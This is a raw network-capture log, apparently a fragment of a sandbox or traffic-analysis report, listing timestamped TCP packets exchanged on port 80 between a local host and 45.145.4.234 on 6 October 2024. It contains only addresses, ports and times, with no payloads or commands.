                                                                                                                                                Oct 6, 2024 22:18:47.348753929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348790884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348830938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348838091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348848104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.348866940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348881960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.348913908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.349004030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349014997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349020004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349029064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349059105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.349081993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.349097967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349107027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349116087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349121094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349129915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349133968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.349149942 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.349179029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350056887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350068092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350074053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350106955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350107908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350115061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350125074 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350130081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350137949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350172997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350172997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350208998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350255966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350270987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350281000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350327015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350358009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350366116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350377083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350382090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350416899 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350447893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350459099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350464106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350467920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350472927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350492001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350506067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350536108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350538015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350543976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350553989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350577116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350579977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350610971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350635052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350656986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350665092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350750923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350764036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350768089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350775003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350780010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350785971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350830078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350864887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350877047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350910902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.350945950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350953102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350963116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350972891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.350992918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351008892 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351082087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351092100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351100922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351104975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351109982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351135015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351147890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351222038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351232052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351241112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351250887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351274967 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351298094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351304054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351305962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351309061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351315022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351317883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351322889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351350069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351365089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351577997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351588964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351593971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351602077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351620913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351655006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351670980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351725101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351732016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351742983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351788044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351856947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351867914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351872921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351877928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351907969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351922035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.351990938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.351996899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352009058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352044106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352128983 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352139950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352144957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352184057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352188110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352193117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352205992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352210999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352210999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352243900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352243900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352317095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352323055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352332115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352336884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352343082 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352371931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352396965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352443933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352448940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352493048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352521896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352535009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352564096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352576017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352607012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352612019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352621078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352626085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352631092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352652073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352677107 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352777004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352791071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.352834940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.352858067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.353013039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353020906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353032112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353037119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353044987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353049994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353055954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.353065968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.353096962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435193062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435245991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435265064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435321093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435339928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435357094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435353041 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435375929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435415030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435415030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435429096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435431957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435458899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435482025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435497046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435499907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435516119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435533047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435544014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435550928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435560942 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435569048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435579062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435587883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435597897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435607910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435614109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435631990 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435650110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435674906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435712099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435717106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435733080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435771942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435775042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435791969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435826063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435837984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435867071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435869932 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435887098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435924053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.435951948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435969114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.435992002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436022043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436038971 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436038971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436062098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436067104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436079025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436093092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436098099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436120033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436148882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436805010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436846018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436863899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436892033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436940908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.436958075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.436976910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437009096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437020063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437047958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437050104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437068939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437107086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437203884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437221050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437239885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437268972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437294960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437354088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437412024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437428951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437450886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437464952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437470913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437517881 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437536955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437546015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437570095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437589884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.437602997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.437648058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.594120026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.599057913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.769934893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.769944906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.769956112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770036936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770041943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770061016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770066023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770076990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770123005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.770185947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770185947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.770194054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770235062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.770261049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770267010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770277977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.770307064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.770323992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.772713900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772757053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772763014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772780895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.772799969 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.772828102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772836924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772880077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.772903919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772911072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772960901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.772991896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.772995949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773008108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773045063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773128986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773133993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773144007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773185968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773243904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773253918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773264885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773298979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773313999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773487091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773498058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773499966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773545980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773565054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773571014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773581982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773612022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:47.773633957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773639917 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773649931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773655891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:47.773664951 CEST806388545.145.4.234192.168.2.6
